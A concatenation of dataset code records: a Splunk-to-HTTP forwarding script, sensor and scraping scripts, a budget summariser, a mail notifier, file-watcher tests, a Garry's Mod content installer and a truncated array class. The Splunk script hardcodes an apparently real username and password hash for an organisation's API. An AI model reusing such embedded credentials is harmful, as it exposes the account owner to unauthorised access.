self.weighted_avg_price = weighted_avg_price\n self.prev_close_price = prev_close_price\n self.last_price = last_price\n self.last_qty = last_qty\n self.bid_price = bid_price\n self.ask_price = ask_price\n self.open_price = open_price\n self.high_price = high_price\n self.low_price = low_price\n self.volume = volume\n self.quote_volume = quote_volume\n self.open_time = open_time\n self.close_time = close_time\n self.first_trade_id = first_trade_id\n self.last_trade_id = last_trade_id\n self.trade_count = trade_count\n\n\nclass Ticker24hr(BaseSymbol):\n def __init__(self, symbols_data):\n self._symbols = self._create_symbols(symbols_data)\n\n @staticmethod\n def _create_symbols(symbols):\n if isinstance(symbols, dict):\n symbols = [symbols]\n\n return {symbol['symbol']: Symbol(symbol=symbol[\"symbol\"],\n price_change=symbol[\"priceChange\"],\n price_change_percent=symbol[\"priceChangePercent\"],\n weighted_avg_price=symbol[\"weightedAvgPrice\"],\n prev_close_price=symbol[\"prevClosePrice\"],\n last_price=symbol[\"lastPrice\"],\n last_qty=symbol[\"lastQty\"],\n bid_price=symbol[\"bidPrice\"],\n ask_price=symbol[\"askPrice\"],\n open_price=symbol[\"openPrice\"],\n high_price=symbol[\"highPrice\"],\n low_price=symbol[\"lowPrice\"],\n volume=symbol[\"volume\"],\n quote_volume=symbol[\"quoteVolume\"],\n open_time=symbol[\"openTime\"],\n close_time=symbol[\"closeTime\"],\n first_trade_id=symbol[\"firstId\"],\n last_trade_id=symbol[\"lastId\"],\n trade_count=symbol[\"count\"]) for symbol in symbols}\n","sub_path":"src/models/ticker_price.py","file_name":"ticker_price.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"82081186","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nimport sys, os,re,json,time, socket,math,urllib2\n#from kafka import KafkaProducer\n#producer = KafkaProducer(bootstrap_servers='172.17.46.14:9092')\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), \"..\", \"..\"))\n\nfrom xml.etree import ElementTree\nimport splunklib.client as client\nimport splunklib.results as results\n\nHOST = \"localhost\"\nPORT =20157\nUSERNAME = \"\"\nPASSWORD = \"\"\nREPORTNAME=\"changeme\"\nAPPNAME = \"phoenix\"\nnow_time=time.time()\n\nservice = client.connect(\n host=HOST,\n port=PORT,\n username=USERNAME,\n password=PASSWORD,\n app=APPNAME)\n\njobs = service.jobs\n\n# calculate the time to start and stop, the rule is:\n# get the last 5 seconds data, ex: if now is 0:06, then start time is 0:01 and the end time is 0:05\nstart_time=(math.floor(now_time/5)*5)-5\nstop_time=math.floor(now_time/5)*5\n# start_time=\"-365d\"\nprint(int(now_time))\nprint(start_time)\nprint(stop_time)\n\n# start the search in splunk\nkwargs_search={\"exec_mode\": \"blocking\",\"earliest_time\":start_time,\"latest_time\":stop_time,'count':0}\n#search_string = \"search index=_internal user=* | head 21 | table user\"\nsearch_string = '|from datamodel:cupdata.apply | stats first(reason) as reason, first(src_ip) as src_ip, first(time) as time,first(fp_browser) as fp_browser,first(fp_mobile) as fp_mobile by path,page,id '\n#search_string = \"search index=access_log | head 21 | table src_ip\"\njob=jobs.create(search_string,**kwargs_search)\nrr = results.ResultsReader(job.results())\nresult_list=[]\nfor result in rr:\n result_list.append(json.dumps(result))\n\nkwargs_search_detailed={\"exec_mode\": 
\"blocking\",\"earliest_time\":start_time,\"latest_time\":stop_time,'count':0}\n#search_string = \"search index=_internal user=* | head 21 | table user\"\nsearch_string_detailed = '|from datamodel:cupdata_detailed.apply '\n#search_string = \"search index=access_log | head 21 | table src_ip\"\njob_detailed=jobs.create(search_string_detailed,**kwargs_search_detailed)\nrr_detailed = results.ResultsReader(job_detailed.results())\nresult_list_detailed=[]\nfor result_detailed in rr_detailed:\n result_list_detailed.append(json.dumps(result_detailed))\n\ndef send_result(input):\n time_str=time.strftime(\"%Y-%m-%d %H:%M:%S\")\n #print(json.dumps(input))\n postdata = {\"body\":input,\n \"security\":\n {\n \"userPassword\":\"4B18E30759E8E1094CAAA72190165FA5\",\n \"userName\":\"rsfhadmin\",\n \"channel\":\"ddn\"\n },\n \"head\":\n {\n \"transDate\":time_str,\n \"orgCode\":\"1026\",\n \"transNo\":\"a2b9a30c29c54d80aea09b45\",\n \"transCode\":\"AM0088\"\n }\n }\n #print(postdata)\n #print(json.dumps(postdata))\n url=\"http://10.193.81.6:9456/\"\n req = urllib2.Request(url, postdata)\n return input\n\n\n# if len(result_list)>0:\n# result_str=\"[\\n\"\n# for ii in range(len(result_list)):\n# if ii%20==19:\n# #result_str+=result_list[ii]+\"]\\n\"\n# #send_result(result_str)\n# result_str=\"[\\n\"\n# ii+=1\n# elif ii==len(result_list)-1:\n# #result_str+=result_list[ii]+\"]\\n\"\n# #send_result(result_str)\n# result_str=\"[\\n\"\n# ii+=1\n# else:\n# #result_str+=result_list[ii]+\",\\n\"\n# ii+=1\n\n\n\nif len(result_list)>0:\n result_queue=[]\n for ii in range(len(result_list)):\n if ii%20==19 :\n result_queue.append(result_list[ii])\n print(result_queue)\n send_result(result_queue)\n result_queue=[]\n elif ii==len(result_list)-1:\n result_queue.append(result_list[ii])\n print(result_queue)\n send_result(result_queue)\n result_queue=[]\n else:\n result_queue.append(result_list[ii])\n #print(result_queue)\n\n\nif len(result_list_detailed)>0:\n result_queue_detailed=[]\n for ii in range(len(result_list_detailed)):\n if ii%20==19 :\n result_queue_detailed.append(result_list_detailed[ii])\n print(result_queue_detailed)\n send_result(result_queue_detailed)\n result_queue_detailed=[]\n elif ii==len(result_list_detailed)-1:\n result_queue.append(result_list_detailed[ii])\n print(result_queue_detailed)\n send_result(result_queue_detailed)\n result_queue_detailed=[]\n else:\n result_queue_detailed.append(result_list_detailed[ii])","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"189749289","text":"import spidev\nimport time\n \n# A0 = 0, A1 = 1, A2 = 2, A3 =3 \ntemp_channel = 0\nprint (\"\\nKytke liittimeen A%1d\\n\" % temp_channel)\n#time.sleep(1)\n \nspi = spidev.SpiDev()\nspi.open(0,0)\nspi.max_speed_hz=1000000\n\ndef readadc(adcnum):\n# read SPI data from MCP3004 chip, 4 possible adc's (0 thru 3)\n if adcnum > 3 or adcnum < 0:\n return -1\n r = spi.xfer2([1,8+adcnum <<4,0])\n adcout = ((r[1] &3) <<8)+r[2]\n return adcout\n \nwhile True:\n\tvalue = readadc(temp_channel) \n\tvolts = (value * 3.3) / 1024\n\ttemperature_C = (volts - 0.5) * 100\n\t#temperature_F = (temperature_C * 9 / 5) + 32\n \n\tprint(\"Jannitetaso = %5.3f V\" % volts )\n\tprint(\"%4.1f Celsiusastetta C\" % temperature_C)\n\t#print(\"%4.1f degrees F\" % 
temperature_F)\n\tprint(\"-------------------------\")\n\ttime.sleep(5)","sub_path":"lampo.py","file_name":"lampo.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"437896444","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 27 11:17:39 2014\n\n@author: Axel\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup as bsoup\n\nr = requests.get('http://www.ncbi.nlm.nih.gov/pubmed/?term=gene+network')\ndoc = r.text\nwith open('fpubmed.html', \"w\") as fpubmed:\n fpubmed.write(doc)\n data = fpubmed.read \nsoup = bsoup(doc)\n#print(soup.title)\n#print(doc)\n\ncount = soup.find_all('meta', {'name':'ncbi_resultcount'})[0]\nprint(count.attrs)\nprint(count['content'])\narticle = soup.find_all('div', {'class':'rprt'})\n#article = soup.find_all('a', { \"linksrc\" : \"docsum_title\" })[0]\n#article = article.text\n#article = article.split()\n#print(article)\n\natitle = soup.find_all(id=\"maincontent\")\nprint(atitle)\n\n\nauthor = soup.find_all('p', { \"class\" : \"desc\" })[0]\nauthor = author.text\nauthor = author.split()\nprint(author)\n","sub_path":"youplaboum/747/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"209262369","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 29 12:56:19 2016\n\n@author: sarath\n\"\"\"\nfrom flask import request, Response\nimport flask_restful\nfrom dial import Dial\n\n\nverbs_dict = {'dial' : Dial}\n\napi = flask_restful.Api()\nclass VerbHandler(flask_restful.Resource):\n @api.representation('text/plain')\n def get(self, verb):\n verb_class = verbs_dict.get(verb,Dial)\n query_dict = dict((param, request.args.get(param)) for param in verb_class.query_params)\n verb = verb_class(query_dict)\n return Response(verb.string(), mimetype='text/xml')\n\n @api.representation('text/plain')\n def post(self, verb):\n verb_class = verbs_dict.get(verb,Dial)\n query_dict = dict((param, request.args.get(param)) for param in Dial.query_params)\n verb = verb_class(query_dict)\n return Response(verb.string(), mimetype='text/xml')\n","sub_path":"verbservice/verb_handler.py","file_name":"verb_handler.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"224427541","text":"def update_edges_traffic(positions,own_position,edges,teamname):\n for pos in positions:\n if pos[0] != teamname and pos[1] != pos[2]:\n if pos[2] == own_position[0]:\n edge = [x[2], x[1], get_edge_length([x[2], x[1]],edges)]\n if edges.count(edge) != 0:\n edges.remove(edge)\n continue\n if pos[1] == own_position[0] and pos[1] != pos[2]:\n try:\n i = edges.index([x[1], x[2],get_edge_length([x[1], x[2]], edges)])\n edge = edges.pop(i)\n edge[2] = edge[2]*2\n edges.insert(i, edge)\n except:\n pass\n return edges\ndef get_edge_length(edge, edges):\n for x in edges:\n if x[0] == edge[0] and x[1] == edge[1]:\n return x[2]\n return 0\n","sub_path":"BACKUPDEMO/updateEdgesTraffic.py","file_name":"updateEdgesTraffic.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"419946896","text":"import os\nimport pandas as pd\n\n\n#Format Currency Function (Downloaded from Web)\ndef as_currency(amount):\n if amount >= 0:\n return '${:,.2f}'.format(amount)\n else:\n return 
'-${:,.2f}'.format(-amount)\n\n\n#Create two DataFrames\nbudgetData = pd.read_csv(\"budget_data.csv\")\ndeltaGross = budgetData[\"Profit/Losses\"].diff()\n\n\n#GetResults\nh1Month=budgetData[\"Date\"].count()\nh2Money=budgetData[\"Profit/Losses\"].sum()\nh3Mean=deltaGross.mean()\nh4Max = str(as_currency(deltaGross.max()))+\" on \" +str(budgetData.loc[deltaGross.idxmax(),\"Date\"])\nh4Min = str(as_currency(deltaGross.min()))+\" on \" +str(budgetData.loc[deltaGross.idxmin(),\"Date\"])\n#h4Max = str(budgetData[\"Profit/Losses\"].max())+\" on \" +str(budgetData.loc[budgetData[\"Profit/Losses\"].idxmax(),\"Date\"])\n\n\n#Print results to Screen\nprint(\"\\n\\nFinancial Analysis\")\nprint(\"______________________________________________________\")\nprint (f'Total Months: {h1Month}')\nprint (f'Total Net Revenue: {as_currency(h2Money)}')\nprint (f'Average Delta: {as_currency(h3Mean)}')\nprint (f'Highest Delta: {h4Max}')\nprint (f'Lowest Delta {h4Min}')\nprint(\"______________________________________________________\")\n\n#Print results to file\nToFile= open(\"GlennResults.txt\",\"w+\")\n\nToFile.write(\"Financial Analysis\\r\\n\")\nToFile.write(\"______________________________________________________\\r\\n\")\nToFile.write (f'Total Months: {h1Month}\\r\\n')\nToFile.write (f'Total Net Revenue: {as_currency(h2Money)}\\r\\n')\nToFile.write (f'Average Delta: {as_currency(h3Mean)}\\r\\n')\nToFile.write (f'Highest Delta: {h4Max}\\r\\n')\nToFile.write (f'Lowest Delta {h4Min}\\r\\n')\nToFile.write(\"______________________________________________________\\r\\n\")\n\nToFile.close()\n","sub_path":"pybank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"621007331","text":"import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.application import MIMEApplication\n\nimport csv\nimport time\n\nimport requests\nimport os\n\ndef mail_babali_jiaji_csv():\n str_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n # 发邮件代码\n _user = \"lgang219@qq.com\"\n _pwd = \"xxxxxxxxxxxxxxxx\"\n _to = \"ndfour@foxmail.com\"\n\n try:\n msg = MIMEMultipart()\n msg[\"Subject\"] = \"[pandy 八百里加急] csv文件投递\"\n msg[\"From\"] = _user\n msg[\"To\"] = _to\n\n msg.attach(MIMEText( '该邮件来自 [pandy 八百里加急催]\\n\\n' + str_time ) )\n\n # 添加附件\n attachment = MIMEApplication( open('/usr/bdpan_movie/daily/pandy/babaili_jiaji.csv', 'rb').read() )\n attachment.add_header('Content-Disposition', 'attachment', filename='babaili_jiaji_' + str_time + '.csv' )\n msg.attach( attachment )\n\n s = smtplib.SMTP_SSL(\"smtp.qq.com\", 465)\n s.login(_user, _pwd)\n s.sendmail(_user, _to, msg.as_string())\n s.quit()\n\n return ''\n except Exception as e:\n msg = '[邮件投递失败]'\n msg += str(e)\n\n return msg\n\n\n# 删除 八百里加急催 生成的 csv 文件\ndef delete_babaili_cui_csv():\n try:\n cmd = 'rm /usr/bdpan_movie/daily/pandy/babaili_jiaji.csv'\n os.system( cmd )\n\n return ''\n except Exception as e:\n msg = '[delete_babaili_cui_csv 失败]'\n msg += str(e)\n return msg\n\n\n# 推送消息到微信\ndef pushtestmsg(msg):\n url = 'https://sc.ftqq.com/SCUxxxxxxxxxxxxxxxxxxxxxxxxxxc.send'\n str_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n desp = 'pandy 八百里加急 monitor 报警信息'\n data = {\n 'text': desp,\n 'desp': msg + '****' + str_time\n }\n try:\n r = requests.get( url, params = data )\n msg = 'Server酱 发送消息成功!!'\n print(msg)\n except Exception as e:\n msg = 'Server酱 发送消息失败,请重试!!'\n 
print(msg)\n\n\n# 读取 babaili_jiaji.csv 中的信息 汇总到 本程序运行目录\ndef babaili_2_folder( babaili_path, folder_path):\n babaili_name = 'babaili_jiaji.csv'\n folder_name = 'out.csv'\n \n babaili_list = []\n try:\n with open( babaili_path + babaili_name, 'r', encoding = 'utf-8-sig' ) as f:\n reader = csv.reader(f)\n for line in reader:\n babaili_item = {}\n # print(type(line))\n # print(line)\n # print()\n if line:\n babaili_item['book_name'] = line[0]\n babaili_item['author'] = line[1]\n babaili_item['contact_method'] = line[2]\n babaili_item['other_info'] = line[3]\n babaili_item['type'] = line[4]\n babaili_item['time'] = line[5]\n babaili_item['url'] = line[6]\n babaili_list.append(babaili_item)\n except Exception as e:\n print('babaili_2_folder failed')\n print(e)\n return\n\n with open( folder_path + folder_name, 'a', encoding = 'utf-8-sig') as f:\n fieldnames = ['book_name', 'author', 'contact_method', 'other_info', 'type', 'time', 'url']\n writer = csv.DictWriter(f, fieldnames = fieldnames )\n for b_item in babaili_list:\n writer.writerow( b_item )\n\n\n\ndef main():\n babaili_path = '/usr/bdpan_movie/daily/pandy/'\n folder_path = '/root/rootcron_tasks/babali_jiaji_monitor/'\n babaili_2_folder( babaili_path, folder_path )\n\n msg = ''\n msg += mail_babali_jiaji_csv()\n msg += '##########'\n msg += delete_babaili_cui_csv()\n\n if len(msg) > 10:\n pushtestmsg( msg )\n\nmain()\n","sub_path":"rootcron_tasks/babali_jiaji_monitor/babaili_jiaji_monitor.py","file_name":"babaili_jiaji_monitor.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"633002499","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport json\nimport os\nimport tempfile\nimport unittest\n\nfrom baseplate import file_watcher\nfrom baseplate.retry import RetryPolicy\n\nfrom .. 
import mock\n\n\nclass FileWatcherTests(unittest.TestCase):\n def test_file_not_found_throws_error(self):\n mock_parser = mock.Mock()\n watcher = file_watcher.FileWatcher(\"/does_not_exist\", mock_parser)\n with self.assertRaises(file_watcher.WatchedFileNotAvailableError):\n watcher.get_data()\n self.assertEqual(mock_parser.call_count, 0)\n\n def test_file_loads_and_parses(self):\n with tempfile.NamedTemporaryFile() as watched_file:\n watched_file.write(b\"hello!\")\n watched_file.flush()\n mock_parser = mock.Mock()\n watcher = file_watcher.FileWatcher(watched_file.name, mock_parser)\n\n result = watcher.get_data()\n self.assertEqual(result, mock_parser.return_value)\n self.assertEqual(mock_parser.call_count, 1)\n\n result = watcher.get_data()\n self.assertEqual(mock_parser.call_count, 1)\n\n # ensure the loaded data stays around even when the file was deleted\n result = watcher.get_data()\n self.assertEqual(result, mock_parser.return_value)\n self.assertEqual(mock_parser.call_count, 1)\n\n def test_file_reloads_when_changed(self):\n with tempfile.NamedTemporaryFile() as watched_file:\n watched_file.write(b\"hello!\")\n watched_file.flush()\n os.utime(watched_file.name, (1, 1))\n watcher = file_watcher.FileWatcher(\n watched_file.name, parser=lambda x: x.read())\n\n result = watcher.get_data()\n self.assertEqual(result, \"hello!\")\n\n watched_file.seek(0)\n watched_file.write(b\"breaking news: hello again!\")\n watched_file.flush()\n os.utime(watched_file.name, (2, 2))\n\n result = watcher.get_data()\n self.assertEqual(result, \"breaking news: hello again!\")\n\n def test_file_failing_to_parse_on_first_load_raises(self):\n with tempfile.NamedTemporaryFile() as watched_file:\n watched_file.write(b\"!\")\n watched_file.flush()\n os.utime(watched_file.name, (1, 1))\n watcher = file_watcher.FileWatcher(\n watched_file.name, parser=json.load)\n\n with self.assertRaises(file_watcher.WatchedFileNotAvailableError):\n watcher.get_data()\n\n def test_file_failing_to_parse_after_first_load_uses_cached_data(self):\n with tempfile.NamedTemporaryFile() as watched_file:\n watched_file.write(b'{\"a\": 1}')\n watched_file.flush()\n os.utime(watched_file.name, (1, 1))\n watcher = file_watcher.FileWatcher(\n watched_file.name, parser=json.load)\n\n result = watcher.get_data()\n self.assertEqual(result, {\"a\": 1})\n\n watched_file.seek(0)\n watched_file.write(b\"!\")\n watched_file.flush()\n os.utime(watched_file.name, (2, 2))\n\n result = watcher.get_data()\n self.assertEqual(result, {\"a\": 1})\n\n watched_file.seek(0)\n watched_file.write(b'{\"b\": 3}')\n watched_file.flush()\n os.utime(watched_file.name, (3, 3))\n\n result = watcher.get_data()\n self.assertEqual(result, {\"b\": 3})\n\n @mock.patch(\"baseplate.retry.RetryPolicy.new\")\n def test_timeout(self, mock_retry_factory):\n with tempfile.NamedTemporaryFile() as watched_file:\n watched_file.write(b\"!\")\n watched_file.flush()\n os.utime(watched_file.name, (1, 1))\n\n mock_retry_policy = mock.MagicMock(spec=RetryPolicy)\n mock_retry_policy.__iter__ = mock.Mock(return_value=iter([3, 2, 1]))\n mock_retry_factory.return_value = mock_retry_policy\n\n with self.assertRaises(file_watcher.WatchedFileNotAvailableError):\n file_watcher.FileWatcher(\n watched_file.name,\n parser=json.load,\n timeout=3,\n )\n","sub_path":"tests/unit/file_watcher_tests.py","file_name":"file_watcher_tests.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"478643731","text":"#! 
/usr/bin/env python\n\nimport sqlite3\nimport os\nimport shutil\n\nconnection = sqlite3.connect('database.sqlite3')\n\nfor row in connection.execute('SELECT ZCREATED,ZIDENTIFIER FROM ZCAPTURE'):\n\ttimeInterval = row[0]\n\thash = row[1]\n\ttimeInterval += 978307200.000000\t\t\t\t\t# Time interval between 1970 (used by Close-up) and the system reference date (used by Everyday)\n\tos.remove(hash + '_thumb')\t\t\t\t\t\t\t# Remove Everyday thumbnail, Close-up will compute its own\n\tshutil.move(hash + '.jpg', '%f' % timeInterval)\t\t# Rename the file such that Close-up recognizes it\n\t\nconnection.close()\nos.remove('database.sqlite3')\n\nprint ('Finished! Now delete EveryCloseUp.python from this directory and copy the rest of its contents to Close-up/Documents/Images')","sub_path":"Converter/EveryCloseUp.py","file_name":"EveryCloseUp.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"414753666","text":"import tkinter as tk\nimport os\nimport psutil\nimport sys\nimport subprocess\n\nfrom tkinter import messagebox as info\nfrom signal import SIGTERM\nfrom thread6 import run_threaded\nfrom time import sleep\n\ntrue = True\nfalse = False\n\nname = 'hl2.exe'\npath = ''\n\nininstall = false\n\ndef extractall(f,p):\n\tzf = open(f,'rb')\n\tzf = py7zlib.Archive7z(zf)\n\n\tfor v in zf.getnames():\n\t\tname = os.path.join(p,v)\n\t\toutdir = os.path.dirname(name)\n\n\t\tif not os.path.exists(outdir):\n\t\t\tos.makedirs(outdir)\n\n\t\toutfile = open(name,'wb')\n\t\toutfile.write(zf.getmember(v).read())\n\t\toutfile.close()\n\ndef resource_path(path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath('.')\n \n return os.path.join(base_path,path)\n\ndef getfont(a):\n return 'Arial',a\n\ndef seterror(a):\n a = str(a)\n\n error.config(text='错误: '+a)\n\nerrorm = [\n '请不要在安装的时候关闭程序!',\n '我说过了不要在这样做!',\n '如果你突然关闭,那么文件是会损坏的!',\n '...',\n '算了,无意义的警告',\n]\n\nerrorn = 0\n\ndef off():\n global errorm\n global errorn\n\n if ininstall:\n seterror(errorm[errorn])\n if errorn < len(errorm)-1:\n errorn = errorn+1\n\n return\n else:\n base.destroy()\n\nbase = tk.Tk()\nbase.title('Garry\\'s Mod CSS容错包全自动安装器 By Neptune QTG')\nbase.geometry('500x250')\nbase.resizable(false,false)\nbase.protocol('WM_DELETE_WINDOW',off)\nbase.iconbitmap(resource_path('icon.ico'))\n\nfm = tk.Frame(base)\nfm.pack()\n\ndef settext(a,b):\n a = str(a)\n\n if b:\n if a.find('GarrysMod') != -1:\n return '发现GMOD进程'\n else:\n return '虽然找到了进程,但路径不像是Gmod'\n else:\n return '你打开游戏了吗?'\n\ndef iexe():\n global pid\n global path\n\n if not os.path.isfile(resource_path('css_content.7z')):\n info.showerror('错误','没有发现压缩包!')\n return\n\n pid = 0\n find = false\n pids = psutil.pids()\n\n for v in pids:\n if v:\n p = psutil.Process(v)\n\n if p.name() == name:\n pid = v\n find = true\n path = psutil.Process(v).exe()\n path = path[0:path.find(name)]\n\n t = settext(path,find)\n\n l2.config(text=t)\n\n if find:\n l3.config(text=path)\n b.config(text='可以开始下一步',command=p2)\n\nl = tk.Label(fm,text='请打开Garry\\'s Mod进程 \\n (Gmod,半条命2物理沙盘(¿))',font=(getfont(28)),width=50,height=2)\nl.pack(side='top')\n\nl2 = tk.Label(fm,text='打开游戏之后,点击检查按钮',font=(getfont(18)),width=50,height=2)\nl2.pack(side='top')\n\nl3 = tk.Label(fm,font=(getfont(15)),width=50,height=2)\nl3.pack(side='bottom')\n\nb = tk.Button(fm,text='检查',width=50,height=2,command=iexe)\nb.pack()\n\ndef p2():\n global name\n\n isok = false\n pids = psutil.pids()\n\n for v in pids:\n p = 
psutil.Process(v)\n\n if p.name() == name:\n isok = true\n\n if not isok:\n global path\n\n path = ''\n\n l2.config(text='你怎么把程序关掉了?')\n l3.config(text=path)\n b.config(text='检查',command=iexe)\n return\n\n global ininstall\n\n ininstall = true\n\n os.kill(pid,SIGTERM)\n\n fm.pack_forget()\n fm2 = tk.Frame(base)\n fm2.pack()\n\n path2 = str(path).replace('\\\\','/')+'garrysmod/addons'\n\n l = tk.Label(fm2,text='安装完成会自动关闭程序,请稍后...',font=(getfont(20)),width=50,height=2)\n l.pack(side='top')\n\n l2 = tk.Label(fm2,text='(如果你解压速度过快,可能进度条还没满就会完成)',font=(getfont(16)),width=50,height=2)\n l2.pack()\n\n w = 498\n canvas = tk.Canvas(fm2,width=w,height=22,bg='white')\n canvas.pack()\n\n global error\n error = tk.Label(fm2,font=(getfont(18)),width=50,height=2)\n error.pack()\n\n fill_line = canvas.create_rectangle(1.5,1.5,0,23,width=0,fill='blue')\n\n if not os.path.exists(path2):\n ininstall = false\n\n l.config(text='似乎不存在路径,请检查游戏路径!')\n n = 0\n return\n\n def unpack():\n subprocess.Popen(resource_path('7za.exe')+' x '+resource_path('css_content.7z')+' -o'+path2,shell=True).wait()\n os._exit(0)\n\n run_threaded(unpack)\n\n x = 1000\n n = w/x\n\n for i in range(x):\n n = n+w/x\n canvas.coords(fill_line,(0,0,n,60))\n fm2.update()\n sleep(0.05)\n\n # zf = open(resource_path('css_content.7z'),'rb')\n # zf = py7zlib.Archive7z(zf)\n # x = len(zf.getnames())\n # n = w/x\n\n # for v in zf.getnames():\n # name = os.path.join(path2,v)\n # outdir = os.path.dirname(name)\n\n # if not os.path.exists(outdir):\n # \tos.makedirs(outdir)\n\n # outfile = open(name,'wb')\n # outfile.write(zf.getmember(v).read())\n # outfile.close()\n\n # n = n+w/x\n # canvas.coords(fill_line,(0,0,n,60))\n # fm2.update()\n\nbase.mainloop()","sub_path":"qtg_garrysmod_cssfix.py","file_name":"qtg_garrysmod_cssfix.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"323581302","text":"import unittest\n\nimport marshmallow\n\nfrom ioc.schema.dependency import LiteralDependency\nfrom ioc.schema.adapters import LiteralDependencyAdapter\n\n\nclass LiteralDependencyAdapterTestCase(unittest.TestCase):\n\n def setUp(self):\n self.schema = LiteralDependencyAdapter()\n\n def test_literal_dependency_str(self):\n params = {\n 'name': 'foo',\n 'type': 'literal',\n 'value': 'int'\n }\n\n dep, errors = self.schema.load(params)\n self.assertIsInstance(dep, LiteralDependency)\n self.assertEqual(dep.value, 'int')\n\n def test_literal_dependency_int(self):\n params = {\n 'name': 'foo',\n 'type': 'literal',\n 'value': 1\n }\n\n dep, errors = self.schema.load(params)\n self.assertIsInstance(dep, LiteralDependency)\n self.assertEqual(dep.value, 1)\n","sub_path":"ioc/schema/tests/test_literal_adapter.py","file_name":"test_literal_adapter.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"465640375","text":"\"\"\"NoBug URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom Bugs import views\n\nurlpatterns = [\n\turl(r'^admin/', admin.site.urls),\n\n\turl(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n\n\turl(r'^bugs/', include('Bugs.urls')),\n\turl(r'^api/bugs$',views.apiBugList),\n\n\turl(r'^login/$', views.login, name='login'),\n\turl(r'^api/login$',views.apiLogin,name='apiLogin'),\n\n\turl(r'^logout$', views.logout, name='logout'),\n\n\turl(r\"^api/bug/(?P[0-9]+)/$\", views.apiBugDetail, name='api_bug_detail'),\n\turl(r\"^api/add/bug/$\", views.apiAddBug, name='apiAddBug'),\n\n\turl(r\"^api/comment/(?P[0-9]+)/$\", views.apiComment, name='apiComment'),\n\turl(r\"^api/add/comment/(?P[0-9]+)/$\", views.apiAddComment, name='apiAddComment'),\n]\n","sub_path":"NoBug/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141086782","text":"# SPDX-License-Identifier: BSD-3-Clause\n# Copyright (c) 2021 Osyris contributors (https://github.com/nvaytet/osyris)\nimport numpy as np\nfrom pint.quantity import Quantity\nfrom pint.unit import Unit\nfrom .tools import value_to_string, make_label\nfrom .. import units\n\n\ndef _comparison_operator(lhs, rhs, op):\n func = getattr(np, op)\n if isinstance(rhs, Array):\n scale_r = rhs.unit.to(lhs._unit.units)\n return func(lhs._array, rhs._array * scale_r.magnitude)\n if isinstance(rhs, Quantity):\n return func(lhs._array, rhs.to(lhs._unit.units).magnitude)\n return func(lhs._array, rhs)\n\n\nclass Array:\n def __init__(self, values=None, unit=None, parent=None, name=\"\"):\n\n if isinstance(values, np.ndarray):\n self._array = values\n else:\n self._array = np.asarray(values)\n\n if unit is None:\n self._unit = 1.0 * units.dimensionless\n elif isinstance(unit, str):\n self._unit = units(unit)\n elif isinstance(unit, Quantity):\n self._unit = unit\n elif isinstance(unit, Unit):\n self._unit = 1.0 * unit\n else:\n raise TypeError(\"Unsupported unit type {}\".format(type(unit)))\n self._parent = parent\n self._name = name\n self.special_functions = [\"sqrt\", \"power\"]\n\n # def __array__(self):\n # return self._array\n\n def __getitem__(self, slice_):\n return self.__class__(values=self._array[slice_],\n unit=self._unit,\n parent=self._parent,\n name=self._name)\n\n def __len__(self):\n if self._array.shape:\n return len(self._array)\n else:\n return 0\n\n def __str__(self):\n name_str = \"'\" + self._name + \"' \"\n if len(self) == 0:\n values_str = \"Value: \" + value_to_string(self.values)\n else:\n values_str = \"Min: \" + value_to_string(\n self.values.min()) + \" Max: \" + value_to_string(self.values.max())\n unit_str = \" [{:~}] 